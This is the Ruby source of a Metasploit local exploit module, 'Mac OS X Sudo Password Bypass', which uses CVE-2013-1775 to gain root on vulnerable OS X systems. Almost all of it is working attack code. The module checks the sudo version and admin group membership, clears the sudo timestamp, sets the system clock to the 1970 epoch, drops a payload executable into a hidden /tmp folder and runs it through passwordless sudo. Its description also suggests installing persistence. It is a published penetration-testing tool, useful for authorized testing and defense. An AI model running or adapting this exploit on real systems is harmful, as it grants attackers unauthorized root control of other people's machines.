metasploit-framework/modules/exploits/osx/local/sudo_password_bypass.rb

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##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
require 'shellwords'
class Metasploit3 < Msf::Exploit::Local
# ManualRanking because it's going to modify system time
# Even when it will try to restore things, user should use
# it at his own risk
Rank = NormalRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
SYSTEMSETUP_PATH = "/usr/sbin/systemsetup"
SUDOER_GROUP = "admin"
VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]
CMD_TIMEOUT = 45
# saved clock config
attr_accessor :clock_changed, :date, :network_server, :networked, :time, :zone
def initialize(info={})
super(update_info(info,
'Name' => 'Mac OS X Sudo Password Bypass',
'Description' => %q{
This module gains a session with root permissions on versions of OS X with
sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,
and possibly lower versions.
If your session belongs to a user with Administrative Privileges
(the user is in the sudoers file and is in the "admin group"), and the
user has ever run the "sudo" command, it is possible to become the super
user by running `sudo -k` and then resetting the system clock to 01-01-1970.
This module will fail silently if the user is not an admin, if the user has never
run the sudo command, or if the admin has locked the Date/Time preferences.
Note: If the user has locked the Date/Time preferences, requests to overwrite
the system clock will be ignored, and the module will silently fail. However,
if the "Require an administrator password to access locked preferences" setting
is not enabled, the Date/Time preferences are often unlocked everytime the admin
logs in, so you can install persistence and wait for a chance later.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Todd C. Miller', # Vulnerability discovery
'joev', # Metasploit module
'juan vazquez' # testing/fixing module bugs
],
'References' =>
[
[ 'CVE', '2013-1775' ],
[ 'OSVDB', '90677' ],
[ 'BID', '58203' ],
[ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]
],
'Platform' => 'osx',
'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86
}
],
[ 'Mac OS X x64 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86_64
}
],
[ 'CMD',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 28 2013'
))
register_advanced_options([
OptString.new('TMP_FILE',
[true,'For the native targets, specifies the path that '+
'the executable will be dropped on the client machine.',
'/tmp/.<random>/<random>']
),
], self.class)
end
# ensure target is vulnerable by checking sudo vn and checking
# user is in admin group.
def check
if cmd_exec("sudo -V") =~ /version\s+([^\s]*)\s*$/
sudo_vn = $1
sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i)
# check vn between 1.6.0 through 1.7.10p6
# and 1.8.0 through 1.8.6p6
if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)
vprint_error "sudo version #{sudo_vn} not vulnerable."
return Exploit::CheckCode::Safe
end
else
vprint_error "sudo not detected on the system."
return Exploit::CheckCode::Safe
end
if not user_in_admin_group?
vprint_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."
return Exploit::CheckCode::Safe
end
# one root for you sir
return Exploit::CheckCode::Vulnerable
end
def exploit
if not user_in_admin_group?
fail_with(Failure::NotFound, "User is not in the 'admin' group, bailing.")
end
# "remember" the current system time/date/network/zone
print_good("User is an admin, continuing...")
print_status("Saving system clock config...")
@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
@network_server = if @networked
cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
end
run_sudo_cmd
end
def cleanup
if @clock_changed
print_status("Resetting system clock to original values") if @time
cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
if @networked
cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
unless @network_server.nil?
cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
end
end
print_good("Completed clock reset.")
else
print_status "Skipping cleanup since the clock was never changed"
end
super
end
private
def run_sudo_cmd
print_status("Resetting user's time stamp file and setting clock to the epoch")
cmd_exec(
"sudo -k; \n"+
"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT"+
" -setdate 01:01:1970 -settime 00:00"
)
if not cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match("1/1/1970")
fail_with(Failure::NoAccess, "Date and time preference pane appears to be locked. By default, this pane is unlocked upon login.")
else
@clock_changed = true
end
# drop the payload (unless CMD)
if using_native_target?
cmd_exec("mkdir -p #{File.dirname(drop_path)}")
write_file(drop_path, generate_payload_exe)
register_files_for_cleanup(drop_path)
cmd_exec("chmod +x #{[drop_path].shelljoin}")
print_status("Payload dropped and registered for cleanup")
end
# Run Test
test = rand_text_alpha(4 + rand(4))
sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ')
print_status("Testing that user has sudoed before...")
output = cmd_exec('echo "" | ' + sudo_cmd_test)
if output =~ /incorrect password attempts\s*$/i
fail_with(Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.")
elsif output =~ /#{test}/
print_good("Test executed succesfully. Running payload.")
else
print_error("Unknown fail while testing, trying to execute the payload anyway...")
end
# Run Payload
sudo_cmd_raw = if using_native_target?
['sudo', '-S', [drop_path].shelljoin].join(' ')
elsif using_cmd_target?
['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')
end
## to prevent the password prompt from destroying session
## backgrounding the sudo payload in order to keep both sessions usable
sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
print_status "Running command: "
print_line sudo_cmd
output = cmd_exec(sudo_cmd)
end
# default cmd_exec timeout to CMD_TIMEOUT constant
def cmd_exec(cmd, args=nil, timeout=CMD_TIMEOUT)
super
end
# helper methods for accessing datastore
def using_native_target?
target.name =~ /native/i
end
def using_cmd_target?
target.name =~ /cmd/i
end
def drop_path
@_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }
end
# checks that the user is in OSX's admin group, necessary to change sys clock
def user_in_admin_group?
cmd_exec("groups `whoami`").split(/\s+/).include?(SUDOER_GROUP)
end
# helper methods for dealing with sudo's vn num
def parse_vn(vn_str)
vn_str.split(/[\.p]/).map(&:to_i)
end
def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])
vn_parts = parse_vn(vn)
ranges.any? do |range|
min_parts = parse_vn(range[0])
max_parts = parse_vn(range[1])
vn_parts.all? do |part|
min = min_parts.shift
max = max_parts.shift
(min.nil? or (not part.nil? and part >= min)) and
(part.nil? or (not max.nil? and part <= max))
end
end
end
end